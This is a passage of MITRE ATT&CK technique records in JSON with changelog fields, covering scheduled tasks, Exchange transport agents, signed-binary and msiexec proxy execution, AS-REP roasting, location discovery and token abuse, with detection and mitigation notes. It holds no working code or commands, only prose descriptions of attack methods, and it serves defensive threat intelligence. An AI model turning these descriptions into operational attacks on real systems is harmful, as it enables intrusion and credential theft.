"x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_effective_permissions": [
"SYSTEM",
"Administrator",
"User"
],
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM",
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS",
"Containers"
],
"x_mitre_remote_support": true,
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:36:26.445000+00:00\", \"old_value\": \"2021-04-20 16:31:11.405000+00:00\"}}}",
"previous_version": "2.1",
"changelog_mitigations": {
"shared": [
"M1018: User Account Management",
"M1026: Privileged Account Management",
"M1028: Operating System Configuration",
"M1047: Audit",
"T1053: Scheduled Task Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0003: Scheduled Job (Scheduled Job Creation)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0032: Container (Container Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-12-12 15:08:20.972000+00:00",
"modified": "2021-10-18 17:05:44.321000+00:00",
"name": "Transport Agent",
"description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1505/002",
"external_id": "T1505.002"
},
{
"source_name": "Microsoft TransportAgent Jun 2016",
"description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.",
"url": "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help"
},
{
"source_name": "ESET LightNeuron May 2019",
"description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.",
"url": "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"ESET",
"Christoffer Str\u00f6mblad"
],
"x_mitre_data_sources": [
"File: File Creation",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"SYSTEM",
"Administrator",
"root"
],
"x_mitre_platforms": [
"Linux",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 17:05:44.321000+00:00\", \"old_value\": \"2020-03-25 22:59:59.124000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Christoffer Str\\u00f6mblad\", \"old_value\": \" Christoffer Str\\u00f6mblad\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1045: Code Signing",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0015: Application Log (Application Log Content)",
"DS0022: File (File Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2018-04-18 17:59:24.739000+00:00",
"modified": "2021-10-16 00:13:19.412000+00:00",
"name": "Signed Binary Proxy Execution",
"description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218",
"external_id": "T1218"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Nishan Maharjan, @loki248",
"Hans Christoffer Gaardl\u00f8s",
"Praetorian"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"File: File Creation",
"Module: Module Load",
"Process: OS API Execution",
"Command: Command Execution",
"Windows Registry: Windows Registry Key Modification",
"Network Traffic: Network Connection Creation"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Application control",
"Digital Certificate Validation"
],
"x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-16 00:13:19.412000+00:00\", \"old_value\": \"2021-01-20 18:12:12.134000+00:00\"}}}",
"previous_version": "2.1",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program",
"M1050: Exploit Protection"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)",
"DS0029: Network Traffic (Network Connection Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-24 14:38:49.266000+00:00",
"modified": "2021-06-07 19:57:26.824000+00:00",
"name": "Msiexec",
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218/007",
"external_id": "T1218.007"
},
{
"source_name": "Microsoft msiexec",
"description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec"
},
{
"source_name": "LOLBAS Msiexec",
"description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.",
"url": "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"
},
{
"source_name": "TrendMicro Msiexec Feb 2018",
"description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"
},
{
"source_name": "Microsoft AlwaysInstallElevated 2018",
"description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.",
"url": "https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Ziv Kaspersky, Cymptom",
"Alexandros Pappas"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Module: Module Load",
"Command: Command Execution",
"Network Traffic: Network Connection Creation"
],
"x_mitre_defense_bypassed": [
"Digital Certificate Validation",
"Application control"
],
"x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-07 19:57:26.824000+00:00\", \"old_value\": \"2020-12-14 18:40:45.170000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][0]\": \"Ziv Kaspersky, Cymptom\"}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0029: Network Traffic (Network Connection Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2018-04-18 17:59:24.739000+00:00",
"modified": "2021-09-01 00:57:01.576000+00:00",
"name": "Signed Script Proxy Execution",
"description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1216",
"external_id": "T1216"
},
{
"source_name": "GitHub Ultimate AppLocker Bypass List",
"description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.",
"url": "https://github.com/api0cradle/UltimateAppLockerByPassList"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Praetorian"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Script: Script Execution"
],
"x_mitre_defense_bypassed": [
"Application control",
"Digital Certificate Validation"
],
"x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-01 00:57:01.576000+00:00\", \"old_value\": \"2020-06-20 22:39:47.559000+00:00\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [
"M1038: Execution Prevention",
"T1216: Signed Script Proxy Execution Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0012: Script (Script Execution)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-08-24 13:43:00.028000+00:00",
"modified": "2021-06-07 19:23:33.039000+00:00",
"name": "AS-REP Roasting",
"description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user\u2019s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1558/004",
"external_id": "T1558.004"
},
{
"source_name": "Harmj0y Roasting AS-REPs Jan 2017",
"description": "HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.",
"url": "http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/"
},
{
"source_name": "Microsoft Kerberos Preauth 2014",
"description": "Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.",
"url": "https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx"
},
{
"source_name": "Stealthbits Cracking AS-REP Roasting Jun 2019",
"description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.",
"url": "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/"
},
{
"source_name": "SANS Attacking Kerberos Nov 2014",
"description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.",
"url": "https://redsiege.com/kerberoast-slides"
},
{
"source_name": "AdSecurity Cracking Kerberos Dec 2015",
"description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.",
"url": "https://adsecurity.org/?p=2293"
},
{
"source_name": "Microsoft Detecting Kerberoasting Feb 2018",
"description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.",
"url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"
},
{
"source_name": "Microsoft 4768 TGT 2017",
"description": "Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Yossi Nisani, Cymptom",
"James Dunn, @jamdunnDFW, EY",
"Swapnil Kumbhar",
"Jacques Pluviose, @Jacqueswildy_IT",
"Dan Nutting, @KerberToast"
],
"x_mitre_data_sources": [
"Active Directory: Active Directory Credential Request"
],
"x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_system_requirements": [
"Valid domain account"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-07 19:23:33.039000+00:00\", \"old_value\": \"2020-10-20 19:30:11.783000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][0]\": \"Yossi Nisani, Cymptom\"}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1027: Password Policies",
"M1041: Encrypt Sensitive Information",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0026: Active Directory (Active Directory Credential Request)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-04-01 16:42:08.735000+00:00",
"modified": "2021-10-15 22:00:56.438000+00:00",
"name": "System Location Discovery",
"description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1614",
"external_id": "T1614"
},
{
"source_name": "FBI Ragnar Locker 2020",
"description": "FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.",
"url": "https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf"
},
{
"source_name": "Sophos Geolocation 2016",
"description": "Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.",
"url": "https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/"
},
{
"source_name": "Bleepingcomputer RAT malware 2020",
"description": "Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.",
"url": "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/"
},
{
"source_name": "AWS Instance Identity Documents",
"description": "Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.",
"url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html"
},
{
"source_name": "Microsoft Azure Instance Metadata 2021",
"description": "Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.",
"url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows"
},
{
"source_name": "Securelist Trasparent Tribe 2020",
"description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.",
"url": "https://securelist.com/transparent-tribe-part-1/98127/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Pooja Natarajan, NEC Corporation India",
"Hiroki Nagahama, NEC Corporation",
"Manikantan Srinivasan, NEC Corporation India",
"Wes Hurd",
"Katie Nickels, Red Canary"
],
"x_mitre_data_sources": [
"Instance: Instance Metadata",
"Process: Process Creation",
"Command: Command Execution",
"Process: OS API Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020)\n\nMonitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS",
"IaaS"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 22:00:56.438000+00:00\", \"old_value\": \"2021-04-20 19:25:49.977000+00:00\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0030: Instance (Instance Metadata)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:39.262000+00:00",
"modified": "2021-10-15 23:57:08.312000+00:00",
"name": "Trusted Developer Utilities Proxy Execution",
"description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1127",
"external_id": "T1127"
},
{
"source_name": "engima0x3 DNX Bypass",
"description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.",
"url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/"
},
{
"source_name": "engima0x3 RCSI Bypass",
"description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.",
"url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/"
},
{
"source_name": "Exploit Monday WinDbg",
"description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.",
"url": "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
},
{
"source_name": "LOLBAS Tracker",
"description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.",
"url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Casey Smith",
"Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Application control"
],
"x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 23:57:08.312000+00:00\", \"old_value\": \"2021-03-05 22:25:49.118000+00:00\"}}}",
"previous_version": "1.2",
"changelog_mitigations": {
"shared": [
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-30 17:37:22.261000+00:00",
"modified": "2021-09-02 17:18:55.891000+00:00",
"name": "Application Access Token",
"description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1550/001",
"external_id": "T1550.001"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/593.html",
"external_id": "CAPEC-593"
},
{
"source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019",
"description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.",
"url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"
},
{
"source_name": "okta",
"description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.",
"url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen"
},
{
"source_name": "Microsoft Identity Platform Access 2019",
"description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.",
"url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"
},
{
"source_name": "Staaldraad Phishing with OAuth 2017",
